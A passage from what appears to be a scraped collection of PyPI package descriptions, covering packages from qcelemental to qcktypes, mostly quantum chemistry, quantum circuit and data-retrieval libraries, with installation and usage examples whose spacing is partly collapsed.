QCElemental supports Python 3.7+.\npython -m pip install qcelemental\nTo install QCElemental with molecule visualization capabilities (useful in iPython or Jupyter notebook environments):\npython -m pip install 'qcelemental[viz]'\nTo install QCElemental with various alignment capabilities using networkx:\npython -m pip install 'qcelemental[align]'\nOr install both:\npython -m pip install 'qcelemental[viz,align]'\nSee documentation.\nPeriodic Table\nA variety of periodic table quantities are available using virtually any alias:\n>>> import qcelemental as qcel\n>>> qcel.periodictable.to_E('KRYPTON')\n'Kr'\n>>> qcel.periodictable.to_element(36)\n'Krypton'\n>>> qcel.periodictable.to_Z('kr84')\n36\n>>> qcel.periodictable.to_A('Kr')\n84\n>>> qcel.periodictable.to_A('D')\n2\n>>> qcel.periodictable.to_mass('kr', return_decimal=True)\nDecimal('83.9114977282')\n>>> qcel.periodictable.to_mass('kr84')\n83.9114977282\n>>> qcel.periodictable.to_mass('Kr86')\n85.9106106269\nPhysical Constants\nPhysical constants can be acquired directly from the NIST CODATA:\n>>> import qcelemental as qcel\n>>> qcel.constants.Hartree_energy_in_eV\n27.21138602\n>>> qcel.constants.get('hartree ENERGY in ev')\n27.21138602\n>>> pc = qcel.constants.get('hartree ENERGY in ev', return_tuple=True)\n>>> pc.label\n'Hartree energy in eV'\n>>> pc.data\nDecimal('27.21138602')\n>>> pc.units\n'eV'\n>>> pc.comment\n'uncertainty=0.000 000 17'\nAlternatively, with the use of the Pint unit conversion package, arbitrary\nconversion factors can be obtained:\n>>> qcel.constants.conversion_factor(\"bohr\", \"miles\")\n3.2881547429884475e-14\nCovalent Radii\nCovalent radii are accessible for most of the periodic table from Alvarez, Dalton Transactions (2008) doi:10.1039/b801115j (details).\n>>> import qcelemental as qcel\n>>> qcel.covalentradii.get('I')\n2.626719314386381\n>>> qcel.covalentradii.get('I', units='angstrom')\n1.39\n>>> qcel.covalentradii.get(116)\nTraceback (most recent call last):\n...\nqcelemental.exceptions.DataUnavailableError: ('covalent radius', 'Lv')\n>>> qcel.covalentradii.get(116, missing=4.0)\n4.0\n>>> qcel.covalentradii.get('iodine', return_tuple=True).dict()\n{'numeric': True, 'label': 'I', 'units': 'angstrom', 'data': Decimal('1.39'), 'comment': 'e.s.d.=3 n=451', 'doi': 'DOI: 10.1039/b801115j'}\nvan der Waals Radii\nVan der Waals radii are accessible for most of the periodic table from Mantina, J. Phys. Chem. 
A (2009) doi: 10.1021/jp8111556(details).>>>importqcelementalasqcel>>>qcel.vdwradii.get('I')3.7416577284064996>>>qcel.vdwradii.get('I',units='angstrom')1.98>>>qcel.vdwradii.get(116)Traceback(mostrecentcalllast):...qcelemental.exceptions.DataUnavailableError:('vanderwaals radius','Lv')>>>qcel.vdwradii.get('iodine',return_tuple=True).dict(){'numeric':True,'label':'I','units':'angstrom','data':Decimal('1.98'),'doi':'DOI: 10.1021/jp8111556'}"} +{"package": "qcengine", "pacakge-description": "QCEngineQuantum chemistry program executor and IO standardizer (QCSchema) for quantum chemistry.ExampleA simple example of QCEngine's capabilities is as follows:>>>importqcengineasqcng>>>importqcelementalasqcel>>>mol=qcel.models.Molecule.from_data(\"\"\"O 0.0 0.000 -0.129H 0.0 -1.494 1.027H 0.0 1.494 1.027\"\"\")>>>inp=qcel.models.AtomicInput(molecule=mol,driver=\"energy\",model={\"method\":\"SCF\",\"basis\":\"sto-3g\"},keywords={\"scf_type\":\"df\"})These input specifications can be executed with thecomputefunction along with a program specifier:>>>ret=qcng.compute(inp,\"psi4\")The results contain a complete record of the computation:>>>ret.return_result-74.45994963230625>>>ret.properties.scf_dipole_moment[0.0,0.0,0.6635967188869244]>>>ret.provenance.cpuIntel(R)Core(TM)i7-7820HQCPU@2.90GHzSee thedocumentationfor more information.LicenseBSD-3C. See theLicense Filefor more information."} +{"package": "qcenter", "pacakge-description": "qcentertest projectFree software: MIT licenseDocumentation:https://qcenter.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.1.0 (2019-09-18)First release on PyPI."} +{"package": "qcentroid-agent-cli", "pacakge-description": "qcentroid-agent-cliClient library to interact with QCentroid Agent API.FunctionsFunctions:obtain status, and contextobtain input datasend output dataset statussend execution logsInstallpipinstallqcentroid-agent-cliUseSimple exampleAs easy as this:fromqcentroid_agent_cliimportQCentroidSolverClientimportlogginglogging.basicConfig(level=logging.DEBUG)API_BASE_URL=\"https://api.qcentroid.xyz\"SOLVER_API_KEY=\"1234-4567-8910\"# Get your solver API_KEY in the platform dashboardSOLVER_ID=\"123\"defmain():# Get the solver detailssolver=QCentroidSolverClient(API_BASE_URL,SOLVER_API_KEY,SOLVER_ID)# Request a queued jobjob=solver.obtainJob()# Notify start of job executionjob.start()# Retrieve the job input datainput_data=job.obtainInputData()output_data={}## TODO: Add your solver code here and generate output_data## Send the solver output data and execution logs to the platformjob.sendOutputData(output_data)job.sendExecutionLog(logs)# End of job executionif__name__==\"__main__\":main()Example for external agents:importrequestsfromqcentroid_agent_cliimportQCentroidSolverClientimportlogginglogging.basicConfig(level=logging.DEBUG)logger=logging.getLogger(__name__)API_BASE_URL=\"https://api.qcentroid.xyz\"SOLVER_API_KEY=\"1234-4567-8910\"# Get your solver API_KEY in the platform dashboardSOLVER_ID=\"123\"defmain():exit=Falseprint(\"QCentroid Agent usage example\")print(\"Starting...\")# Initialize the agent and get the solver details and a valid access tokensolver=QCentroidSolverClient(API_BASE_URL,SOLVER_API_KEY,SOLVER_ID)print(\"Solver initialization successful.\")# Loop to request queued jobs until any exit condition you want to setwhilenotexit:try:print(\"Checking for pending jobs...\")# Request a queued job (the oldest one will be returned)job=solver.obtainJob()ifjob:print(\"New 
job received.\")# There is a job to be processed!try:print(\"Processing job...\")# Notify the platform we're starting to process this jobjob.start()# Retrieve the input datainput_data=job.obtainInputData()output_data={}## TODO: add your solver code here and generate output_data#print(\"Job processed successfully.\")# Send the solver output data to the platformjob.sendOutputData(output_data)# Send the solver execution logs to check them thorugh the platform dashboard# TODO: job.sendExecutionLog(logs)job.end()exceptExceptionase:# Job execution has failed, notify the platform about the errorprint(\"Error during job execution.\")job.error(e)else:# No queued jobs. Wait for 1 minute and check againprint(\"No pending jobs. Waiting for 1 minute...\")time.sleep(60)exceptrequests.RequestExceptionase:# Error in an API request# Whether parameters are incorrect (URL, api-key or solver_id), or there are connectivity issuesprint(f\"QCentroid Agent: API request failed:{e}\")exit=TrueexceptExceptionase:# Any other errorsprint(f\"QCentroid Agent error:{e}\")exit=Trueprint(\"End.\")if__name__==\"__main__\":main()VersioningUpdate manually on main thepyproject.tomltheversionfield to match the next release tag. Launch anew version on Releasessection selecting a new tag matching the version. Create the release. The release will be published on pypi.orgDebuging locallypipinstall.#install the current version of the componentpythonmain.py#run the client version that uses the package"} +{"package": "qcew", "pacakge-description": "qcewA package for retrieving Quarterly Census of Employment and Wages (QCEW) data from the Bureau of Labor Statistics'database.RequirementsPython \u2265 3.8InstallationUse the package managerpipto install qcew.pipinstallqcewUsageimportqcew# Get the entire quarterly census of employment and wages database for 2020.data=qcew.get_qcew_data(year=\"2020\",annual=False,fields=None)# Get annual average employment and pay data for the United States from 2001 to 2021.data=qcew.get_qcew_data_slice(slice_type=\"area\",qcew_codes=[\"US000\"],years=[str(i)foriinrange(2001,2022)],annual_data=True,fields=[\"area_fips\",\"own_code\",\"industry_code\",\"year\",\"disclosure_code\",\"annual_avg_emplvl\",\"avg_annual_pay\"])# Get monthly employment data for the state of Hawaii as well as Honolulu County, HI in 2020.data=qcew.get_qcew_data_slice(slice_type=\"area\",qcew_codes=[\"15000\",# Hawaii -- Statewide\"15003\",# Honolulu County, HI],years=[\"2020\"],annual_data=False,fields=[\"area_fips\",\"own_code\",\"industry_code\",\"year\",\"qtr\",\"disclosure_code\",\"month1_emplvl\",\"month2_emplvl\",\"month3_emplvl\"])# Get annual average employment and pay data for the manufacturing sector as a whole from 2010 to 2020.data=qcew.get_qcew_data_slice(slice_type=\"industry\",qcew_codes=[\"31-33\",# NAICS code for manufacturing sector.],years=[str(i)foriinrange(2010,2021)],annual_data=True,fields=[\"area_fips\",\"own_code\",\"industry_code\",\"year\",\"disclosure_code\",\"annual_avg_emplvl\",\"avg_annual_pay\"])# Get monthly employment data for establishments with fewer than 5 employees in the first quarter of 2021.data=qcew.get_qcew_data_slice(slice_type=\"size\",qcew_codes=[\"1\",# Size code for establishments with fewer than 5 employees.],years=[\"2021\"],annual_data=False,fields=[\"area_fips\",\"own_code\",\"industry_code\",\"size_code\",\"year\",\"qtr\",\"disclosure_code\",\"month1_emplvl\",\"month2_emplvl\",\"month3_emplvl\"])LicenseDistributed under the MIT license. 
SeeLICENSEfor more information."} +{"package": "qcfinancial", "pacakge-description": "Derivative Valuation EngineLibrer\u00eda para la valorizaci\u00f3n de derivados lineales de tasa de inter\u00e9s y tipo de cambio.Library for the valuation of linear interest rate and fx rate derivatives."} +{"package": "qcfoptions", "pacakge-description": "Option Calculator and SimulatorGit Repository : [https://github.com/austingriffith94/qcfoptions](https://github.com/austingriffith94/qcfoptions)An option calculator born from the need to calculate the prices of various options in the QCF program at Georgia Tech. This package provides:Black Scholes pricing of traditional, barrier and exotic optionsGreeks of European style optionsSimulations of underlying asset using stochastic processesPricing of options utilizing the simulated motion of the underlyingThis was made initially to help avoid rewriting a Black Scholes calculators each time it was necessary. I\u2019m hoping it can also provide an outlet for those looking for a general code/framework to help in the creation and experimentation of their own option simulations. Each function and class has a complete explanation on what it does, should the user be interested. For example, if you want to know how to work the European option function, simply type :>>> from qcfoptions import bsoptions>>> help(bsoptions.EuroOptions)into the command console, and it should return a relatively complete description of the function.You can install this package from PyPI by using the command :pip install qcfoptionsPlatform: UNKNOWN\nClassifier: Development Status :: 3 - Alpha\nClassifier: Intended Audience :: Financial and Insurance Industry\nClassifier: License :: OSI Approved :: MIT License\nClassifier: Natural Language :: English\nClassifier: Programming Language :: Python :: 3\nRequires-Python: ~=3.0\nDescription-Content-Type: text/markdown"} +{"package": "qcfractal", "pacakge-description": "No description available on PyPI."} +{"package": "qcfractalcompute", "pacakge-description": "No description available on PyPI."} +{"package": "qcge", "pacakge-description": "Quantum Circuit Game Engine for Pygame-based Quantum GamesThis is a Quantum Circuit Game Engine for integrating Quantum Circuits into your Pygame-based quantum game. You can use it simply by creating an object of theQuantumCircuitGridclass stored in thequantum_circuit.pyfile.This Quantum Circuit was originaly created for theQPong Gamedeveloped byJunye Huangin the12 Days of Qiskit Program. I created this engine by re-writing its code locatedhereto make it modular and abstract for easy use with any quantum game.The features I have included are:Modular and Abstract Code.All configurations in one place in theconfig.pyfile.Developers can create a Quantum Circuit for any number of qubit/wires and circuit width (max. number of gates which can be applied in a wire) of their choice.Easy to change UI by replacing color configs and graphics for gates with those of your choice.Easy to change the size of Quantum Circuit by adjustingQUANTUM_CIRCUIT_TILE_SIZE,GATE_TILE_WIDTH, andGATE_TILE_HIEGHTin theconfig.pyfile.Easily change controls by changing keys in thehandle_input()method of theQuantumCircuitGridclass.If this project is helpful for you or you liked my work, consider supporting me throughKo.fi\ud83c\udf75. 
Also, kindly consider giving a star to this repository.\ud83d\ude01\nAbout me\nI am Ashmit JaiSarita Gupta, an Engineering Physics Undergraduate passionate about Quantum Computing, Machine Learning, UI/UX, and Web Development. I have worked on many projects in these fields, participated in hackathons, and am a part of great organizations in these fields. You can explore more about me, my work, and my experience at various organizations through my portfolio website: https://jaisarita.vercel.app/ \u2604\ufe0f\nInstallation\npip install qcge\nUsage\nYou can use it simply by creating an object of the QuantumCircuitGrid class stored in the quantum_circuit.py file. The constructor of QuantumCircuitGrid takes these values as arguments:\nposition: Position of the Quantum Circuit in the game window.\nnum_qubits: Number of Qubits in the Quantum Circuit.\nnum_columns: Circuit width (max. number of gates which can be applied in a wire).\ntile_size (Optional, Default Value = 36): Size of a single tile unit of the Quantum Circuit. It is the square area containing a single gate in the quantum circuit.\ngate_dimensions (Optional, Default Value = [24, 24]): [Width, Height] of quantum gates.\nbackground_color (Optional, Default Value = '#444654'): Background Color of the Quantum Circuit.\nwire_color (Optional, Default Value = '#ffffff'): Color of Quantum Wire in the Quantum Circuit.\ngate_phase_angle_color (Optional, Default Value = '#97ad40'): Color to represent the phase angle of Rotation Gates.\nYou can run your quantum circuit on the BasicAer Simulator by using this function:\ndef run_quantum_circuit(self, quantum_circuit):\n    simulator = BasicAer.get_backend(\"statevector_simulator\")\n    quantum_circuit.measure_all()\n    transpiled_circuit = transpile(quantum_circuit, simulator)\n    counts = simulator.run(transpiled_circuit, shots=1).result().get_counts()\n    measured_state = int(list(counts.keys())[0], 2)\n    return measured_state\nConfigurations\nAll the configurations for Quantum Circuit can be done in the config.py file. 
The controls of the quantum circuit in the game can be changed from the defaults mentioned below by changing keys in thehandle_input()method of theQuantumCircuitGridclass.You can change the size of Quantum Circuit by passing optional parameterstile_size, andgate_dimensions(= [GATE_TILE_WIDTH, GATE_TILE_HIEGHT]) to theqcge.QuantumCircuitGridclass as parameters.You can change UI colors by passing optional parametersbackground_color,wire_color, andgate_phase_angle_colorto theqcge.QuantumCircuitGridclass as parameters.Default values of these optional parameter are:tile_size=36gate_dimensions=[24,24]background_color='#444654'wire_color='#ffffff'gate_phase_angle_color='#97ad40'Game Controls for Building Quantum CircuitW, A, S, D Keys:Move the \"Circuit Cursor\" in the Quantum Circuit to the place where you want to add a gate in the circuit.Backspace Key:Remove the gate present at the Circuit Cursor.Delete Key:Clear the Quantum Circuit, i.e., remove all gates from the Quantum Circuit.X Key:Add X Gate to the quantum circuit.Y Key:Add Y Gate to the quantum circuit.Z Key:Add Z Gate to the quantum circuit.H Key:Add H Gate to the quantum circuit.C, R, E Keys:PressC Keyto convert the X, Y, Z, or H gates into CX, CY, CZ, and CH gates respectively, and then pressR KeyandF Keyto the control to qubit above or below respectively.Q and E Keys:To convert X, Y, and Z into RX, RY, and RZ gates respectively.Q Keydecreases the rotation angle by \u03c0/8 andE Keyincreases the rotation angle by \u03c0/8."} +{"package": "qcg-pilotjob", "pacakge-description": "QCG-PilotJobQCG-PilotJob is a lightweight service for execution of many computing tasks inside one allocationAuthor: Piotr Koptapkopta@man.poznan.pl, Tomasz Piontekpiontek@man.poznan.pl, Bartosz Bosakbbosak@man.poznan.plCopyright (C) 2017-2021 Poznan Supercomputing and Networking CenterOverviewThe QCG-PilotJob system is designed to schedule and execute many small jobs inside one scheduling system allocation.\nDirect submission of a large group of jobs to a scheduling system can result in long aggregated time to finish as\neach single job is scheduled independently and waits in a queue. On the other hand the submission of a group of jobs\ncan be restricted or even forbidden by administrative policies defined on clusters.\nOne can argue that there are available job array mechanisms in many systems, however the traditional job array\nmechanism allows to run only bunch of jobs having the same resource requirements while jobs being parts of\na multiscale simulation by nature vary in requirements and therefore need more flexible solutions.The core component of QCG-PilotJob system is QCG-PilotJob Manager.\nFrom the scheduling system perspective, QCG-PilotJob Manager, is seen as\na single job inside a single user allocation. It means that QCG-PilotJob Manager controls an execution\nof a complex experiment consisting of many\njobs on resources reserved for the single job allocation. The manager\nlistens to user's requests and executes commands like submit job, cancel\njob and report resources usage. In order to manage the resources and\njobs the system takes into account both resources availability and\nmutual dependencies between jobs. Two interfaces are defined to\ncommunicate with the system: file-based (batch mode) and API based. 
The former\none is dedicated and more convenient for a static scenarios when a\nnumber of jobs is known in advance to the QCG-PilotJob Manager start.\nThe API based interface is more general and flexible as it allows to\ndynamically send new requests and track execution of previously\nsubmitted jobs during the run-time.To allow user's to test their scenarios, QCG-PilotJob Manager supportslocalexecution mode, in which all job's\nare executed on local machine and doesn't require any scheduling system allocation.DocumentationThe documentation of the QCG-PilotJob system is available athttps://qcg-pilotjob.readthedocs.orgInstallationThe latest stable version of QCG-PilotJob can be installed with pip$pipinstallqcg-pilotjob"} +{"package": "qcg-pilotjob-cmds", "pacakge-description": "QCG-PilotJob Command Line Tools (cmds)The package provides a set of command line tools for reporting and analysis of QCG-PilotJob execution.Author: Piotr Koptapkopta@man.poznan.pl, Tomasz Piontekpiontek@man.poznan.pl, Bartosz Bosakbbosak@man.poznan.plCopyright (C) 2017-2021 Poznan Supercomputing and Networking CenterDocumentationThe documentation of the QCG-PilotJob system is available athttps://qcg-pilotjob.readthedocs.orgInstallationThe latest stable version of QCG-PilotJob Command Line Tools can be installed with pip$pipinstallqcg-pilotjob-cmds"} +{"package": "qcg-pilotjob-executor-api", "pacakge-description": "QCG-PilotJob Executor APIQCG-PilotJob Executor API, by imitation of the Python Executor API,\nprovides a relatively easy way of usage of QCG-PilotJob. It is targeted to\nfulfil needs of basic execution scenarios, but may be useful also for more advanced ones.Author: Piotr Koptapkopta@man.poznan.pl, Tomasz Piontekpiontek@man.poznan.pl, Bartosz Bosakbbosak@man.poznan.plCopyright (C) 2017-2021 Poznan Supercomputing and Networking CenterDocumentationThe documentation of the QCG-PilotJob system is available athttps://qcg-pilotjob.readthedocs.orgInstallationThe latest stable version of QCG-PilotJob Executor API can be installed with pip$pipinstallqcg-pilotjob-executor-api"} +{"package": "qcgpu", "pacakge-description": "QCGPUOpen Source, High Performance & Hardware Accelerated, Quantum Computer\nSimulator. Read theresearch paper.Features:Written with OpenCL. Accelerated your simulations with GPUs and other\naccelerators, while still running cross device and cross platform.Simulation of arbitrary quantum circuitsIncludes example algorithm implementationsSupport for arbitrary gate creation/application, with many built in.InstallingThis library is distributed onPyPIand can be installed using\npip:$pipinstallqcgpuFor more information read the fullinstalling docs."} +{"package": "qcgrid", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qche", "pacakge-description": "UNKNOWN"} +{"package": "qcheck", "pacakge-description": "No description available on PyPI."} +{"package": "qchecker", "pacakge-description": "qCheckerQuick Checker? Quality Checker? Quinoa Checker? qChecker can be whatever you\nwant it to be.qChecker is a library intended to identify semantically meaningful\nmicro-antipatterns in student code and can describe those issues to students\nalong with how to fix them. For example, have your students ever written code\nlike this?deffoo(x):ifx%2==0:returnTrueelse:returnFalseqChecker is here to help! TheIfElseReturnBoolpattern will have no problem\nidentifying this. 
Even specifying where in the code the defect is:TextRange(2,4->5,20)and providing a description of the error with isomorphic\nrefactorings:Looks like you are returning two booleans inside of an If/Else statement.\nIt might be better if you just return the If condition or its inverse.For example, instead of:ifx<5:returnTrueelse:returnFalseConsider doing this:returnx<5...DocumentationCheck out the documentation for qChecker on ReadTheDocs:https://qchecker.readthedocs.io/Installpip install qcheckerUsageCurrently, concrete subclasses ofqchecker.Substructuredefine\naniter_matchesclass method which iterates overqchecker.match.Matchobjects identifying where in the code those particular substructures occur.For example:fromqchecker.substructuresimportIfElseReturnBoolcode=\"\"\"class Foo:def __init__(self, x):self.x = xdef bar(self):if self.x < 10:return Trueelse:return False\"\"\".strip()matches=IfElseReturnBool.iter_matches(code)print(IfElseReturnBool.technical_description)print(*matches,sep=\"\\n\")would print thetechnical_descriptionof theIfElseReturnBoolSubstructure\nfollowed by aMatchobject containing the mane of the pattern matched, the\ndescription, and theTextRangewhere the pattern occurs.If(..)[Return bool] Else[Return !bool]\nMatch(\"If/Else Return Bool\", \"Looks like you are returning two [...]\", TextRange(6,8->9,24))ASUBSTRUCTURESconstant is included in thesubstructuresmodule that\ncontains all substructures. This can be used, for example:fromqchecker.substructuresimportSUBSTRUCTURESfromqchecker.parserimportCodeModulecode=CodeModule(r'''def foo(x):x = x + 1if (x < 5) == True:return Trueelse:return False'''.strip())matches=[]forsubstructureinSUBSTRUCTURES:matches+=substructure.iter_matches(code)formatchinmatches:print(match)Which will produce the following matches:Match(\"Redundant Comparison\", \"It seems like you are comparing [...]\", TextRange(3,7->3,22))\nMatch(\"Augmentable Assignment\", \"It looks like you are writting an [...]\", TextRange(2,4->2,13))\nMatch(\"If/Else Return Bool\", \"Looks like you are returning two [...]\", TextRange(3,4->6,20))Note:While theiter_matchescan take a string of code as a parameter, if you intend\nto match the same piece of code against several substructures, it is better to\nparse the code first into a singleCodeModuleto use with all substructures.\nThis has been shown to improve performance 3-4 times on assignment-sized\nprojects (80-400 lines of code).The string parameter to theiter_matchesetc. methods is deprecated and will\nbe removed in future versions.What Assumptions does qChecker Make?qChecker assumes the code it is working on is relatively simple and isn't using\nany of Python's black magic features in strange ways. 
This means qChecker is\nonly appropriate for novice students as some assumptions it makes about the\nproperties of the code it operates on are quite bold.For example, qChecker assumes multiplication will always be commutative, that\nevery object that supports a particular operator (e.g.__add__) will always\nhave the corresponding augmented operator (e.g.__iadd__), and that functions\ndon't have any strange and wacky side effects that would cause subsequent calls\nin the same expression to behave differently \u2013 among others.Extras - Programmatic Flake8 and Pylintqchecker can be installed with support for programmatically running flake8 and\npylint to generate match objects.Install qchecker with the extras \"general_checks\":pip install qchecker[general_checks]This will allow you to import thegeneralmodule of qchecker which reveals two\nfunctions:get_flake8_matches(code: str) -> list[Match]which returns the matches\ndetected by flake8.get_pylint_matches(code: str, errors: list[str] = None) -> list[Match]which\nreturns the matches detected by pylint. A list of pylint error codes can be\nprovided to only detect those errors and ignore all others.CitationIf you use this software, please cite it as below:@software{finnie-ansley2022qchecker,\n author = {Finnie-Ansley, James},\n month = {6},\n title = {{qChecker}},\n url = {https://github.com/James-Ansley/qchecker},\n version = {1.1.0},\n year = {2022}\n}"} +{"package": "qchk", "pacakge-description": "qcheckA script to display user quota info graphically on the terminalThis is just a wrapper script around quota -a, therefore quota should be installed and users should have access to itStoragespacereportforuser'saccount:storage:|==============|40%,393MBused,583MBfreefilecount:|===========|34%,6822Used,13178FreeInstall and build locallygitclone$repopip3installbuild\naptinstallpython3-virtualenvcd$repopython3-mbuildpip3installdist/qcheck...*...whlCool use casesYou can have qcheck run on login for a user by placing the following in/etc/profile.d/motd.sh/usr/local/bin/qcheck $USER"} +{"package": "qchviewer", "pacakge-description": "qchviewerA simple script to directly open standalone Qt Help file by AssistantFree software: Apache License 2.0Documentation:https://qchviewer.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand thePyPackageTemplateproject template.History0.1.0 (2017-08-08)First release."} +{"package": "qci-client", "pacakge-description": "QCI ClientGetting startedEnvironment VariablesThese environment variables must be set in order to use access the API--QCI_TOKEN - token for Qatalyst APIQCI_API_URL - Example: \"https://api.qci-prod.com\"Installationqci-clientcurrently supports Python 3.8-11, as specified in the PEP-621-compliant\npyproject.toml.Installqci-clientfrom thepublic PyPI serverinto your Python virtual environment using--pipinstallqci-client"} +{"package": "qcinfo", "pacakge-description": ""} +{"package": "qcio", "pacakge-description": "Quantum Chemistry I/OBeautiful and user friendly data structures for quantum chemistry.Inspired byQCElemental. Built for consistency and rapid development.qcioworks in harmony with a suite of other quantum chemistry tools for fast, structured, and interoperable quantum chemistry.The QC Suite of Programsqcio- Beautiful and user friendly data structures for quantum chemistry.qcparse- A library for efficient parsing of quantum chemistry data into structuredqcioobjects.qcop- A package for operating quantum chemistry programs usingqciostandardized data structures. 
Compatible withTeraChem,psi4,QChem,NWChem,ORCA,Molpro,geomeTRICand many more.BigChem- A distributed application for running quantum chemistry calculations at scale across clusters of computers or the cloud. Bring multi-node scaling to your favorite quantum chemistry program.ChemCloud- Aweb applicationand associatedPython clientfor exposing a BigChem cluster securely over the internet.InstallationpipinstallqcioQuickstartqciois built around a simple mental model:Inputobjects are used to define inputs for a quantum chemistry program, andOutputobjects are used to capture the outputs from a quantum chemistry program.Allqcioobjects can be serialized and saved to disk by calling.save(\"filename.json\")and loaded from disk by calling.open(\"filename.json\").qciosupportsjson,yaml, andtomlfile formats. Binary data will be automatically base64 encoded and decoded when saving and loading.Input ObjectsProgramInput - Core input object for a single QC program.fromqcioimportMolecule,ProgramInput# xyz files or saved Molecule objects can be opened from diskcaffeine=Molecule.open(\"caffeine.xyz\")# Define the program inputprog_input=ProgramInput(molecule=caffeine,calctype=\"energy\",keywords={\"purify\":\"no\",\"restricted\":False},model={\"method\":\"hf\",\"basis\":\"sto-3g\"},extras={\"comment\":\"This is a comment\"},# Anything extra not in the schema)# Binary or other files used as input can be addedprog_input.open_file(\"wfn.dat\")prog_input.keywords[\"initial_guess\"]=\"wfn.dat\"# Save the input to disk in json, yaml, or toml formatprog_input.save(\"input.json\")# Open the input from diskprog_input=ProgramInput.open(\"input.json\")DualProgramInput - Input object for a workflow that uses multiple QC programs.DualProgramInputobjects can be used to power workflows that require multiple QC programs. For example, a geometry optimization workflow might usegeomeTRICto power the optimization and useterachemto compute the energies and gradients.fromqcioimportMolecule,DualProgramInput# xyz files or saved Molecule objects can be opened from diskcaffeine=Molecule.open(\"caffeine.xyz\")# Define the program inputprog_input=DualProgramInput(molecule=caffeine,calctype=\"optimization\",keywords={\"maxiter\":250},subprogram=\"terachem\",subprogram_args={\"model\":{\"method\":\"hf\",\"basis\":\"sto-3g\"},\"keywords\":{\"purify\":\"no\",\"restricted\":False},},extras={\"comment\":\"This is a comment\"},# Anything extra not in the schema)FileInput - Input object for a QC programs using native file formats.qcioalso supports the native file formats of each QC program with aFileInputobject. Assume you have a directory like this with your input files forpsi4:psi4/\n input.dat\n geometry.xyz\n wfn.datYou can collect these native files and any associated command line arguments needed to specify a calculation into aFileInputobject like this:fromqcioimportFileInputpsi4_input=FileInput.from_directory(\"psi4\")# All input files will be loaded into the `files` attributepsi4_input.files# {'input.dat': '...', 'geometry.xyz': '...', 'wfn.dat': '...'}# Add psi4 command line args to the inputpsi4_input.cmdline_args.extend([\"-n\",\"4\"])# Files can be dumped to a directory for a calculationpsi4_input.save_files(\"psi4\")Modifying Input ObjectsObjects are immutable by default so if you want to modify an object cast it to a dictionary, make the desired modification, and then instantiate a new object. 
This prevents accidentally modifying objects that may already be referenced in other calculations--perhaps as.input_dataon anOutputobject.# Cast to a dictionary and modifynew_input_dict=prog_input.model_dumps()new_input_dict[\"model\"][\"method\"]=\"b3lyp\"# Instantiate a new objectnew_prog_input=ProgramInput(**new_input_dict)Output ObjectsSinglePointOutput and OptimizationOutputCurrently supportedOutputobjects includeSinglePointOutputfor energy, gradient, and hessian calculations; andOptimizationOutputfor optimization and transition state calculations. AllOutputobjects have the same basic API:output.input_data# Input data used by the QC programoutput.success# Whether the calculation succeededoutput.results# All structured results from the calculationoutput.stdout# Stdout log from the calculationoutput.pstdout# Shortcut to print out the stdout in human readable formatoutput.files# Any files returned by the calculationoutput.provenance# Provenance information about the calculationoutput.extras# Any extra information not in the schemaThe only difference between aSinglePointOutputand anOptimizationOutputis theresultsattribute.SinglePointOutputobjects have aSinglePointResultsobject, andOptimizationOutputobjects have anOptimizationResultsobject. Available attributes for each result type can be found by callingdir()on the object.dir(output.results)Results can be saved to disk in json, yaml, or toml format by calling.save(\"filename.{json/yaml/toml}\")and loaded from disk by calling.open(\"filename.{json/yaml/toml}\").ProgramFailureFailed calculations are represented by aProgramFailureobject. This object has the same API asOutputobjects but also has a.tracebackattribute that captures the stack trace.output.traceback# Stack trace from the failed calculationoutput.ptraceback# Shortcut to print out the traceback in human readable formatSupportIf you have any issues withqcioor would like to request a feature, please open anissue."} +{"package": "qc-iodata", "pacakge-description": "AboutIOData is a HORTON 3 module for input/output of quantum chemistry file formats.\nDocumentation is here:https://iodata.readthedocs.io/en/latest/index.htmlCitationPlease use the following citation in any publication using IOData library:\u201cIOData: A python library for reading, writing, and converting computational chemistry file\nformats and generating input files.\u201d, T. Verstraelen, W. Adams, L. Pujal, A. Tehrani, B. D.\nKelly, L. Macaya, F. Meng, M. Richer, R. Hernandez\u2010Esparza, X. D. Yang, M. Chan, T. D. Kim, M.\nCools\u2010Ceuppens, V. Chuiko, E. Vohringer\u2010Martinez,P. W. Ayers, F. Heidar\u2010Zadeh,J Comput Chem. 2021; 42: 458\u2013 464.InstallationIn anticipation of the 1.0 release of IOData, install the latest git revision\nas follows:python-mpipinstallgit+https://github.com/theochem/iodata.gitAdd the--userargument if you are not working in a virtual or conda\nenvironment. 
Note that there may be API changes between subsequent revisions.Seehttps://iodata.readthedocs.io/en/latest/install.htmlfor full details."} +{"package": "qcirc", "pacakge-description": "Fast and comfortable circuit compiling to pulse"} +{"package": "qcircuit", "pacakge-description": "No description available on PyPI."} +{"package": "qcis-sim", "pacakge-description": "A simulator for QCIS.fromqcis_simimportrunqcis_str=\"\"\"H Q22H Q27X Q27Y Q27Z Q27S Q27SD Q27T Q27TD Q27CZ Q27 Q22B Q1 Q4I Q1 0.1RX Q22 0.2RY Q22 0.2RZ Q10 0.2M Q22M Q27\"\"\"print(run(qcis_str,shots=100,topo=True))# topo: topological check"} +{"package": "qck", "pacakge-description": "# Qck \ud83e\udd86\ud83d\udc69\u200d\ud83d\udcbbQck (pronounced \u201cquack\u201d) is a CLI script to conveniently run\n[DuckDB](https://duckdb.org/) SQL scripts with support for\n[Jina](https://jinja.palletsprojects.com/) templating.## \ud83d\udee0\ufe0f InstallationUsepip install qckto install. This will make available theqckscript.## \ud83d\ude80 UsageRunqck \u2013helpto view the built-in documentation.Runningqckwith just a SQL file will execute the query and print\nthe results to the terminal:`bash qck myquery.sql `You can also LIMIT the number of rows in the output by adding a flag:`bash qck myquery.sql--limit10 # will only print 10 rows `To execute a query and write the result to a Parquet file, use\u2013to-parquet:`bash qck myquery.sql--to-parquetmyresult.parquet `"} +{"package": "qckit", "pacakge-description": "No description available on PyPI."} +{"package": "qck-pyiseasy", "pacakge-description": "The Python-Easy ProjectMade by Tarvey@github quaqak@youtubeHow to use it?Its easy! just type \"pip install easypython\"Commandsshow - Shows text on the screeniw = Prints and waits for user input.docmd - Runs a command in bash or cmd.Functionsiswin() - Checks if a user is on windows.if iswin():\nshow(\"Hi Windows User!\")"} +{"package": "qcktypes", "pacakge-description": "qcktypesPython implementation ofDyne's file extension listWhat is thisThere I was, trying to get files out of a directory and categorize them based on their file extension. \"This is probably already a module\" I said. I was right, there it was, gloriousfiletype.\"Wait... what is a MIME bruh \ud83d\ude2d\"I don't 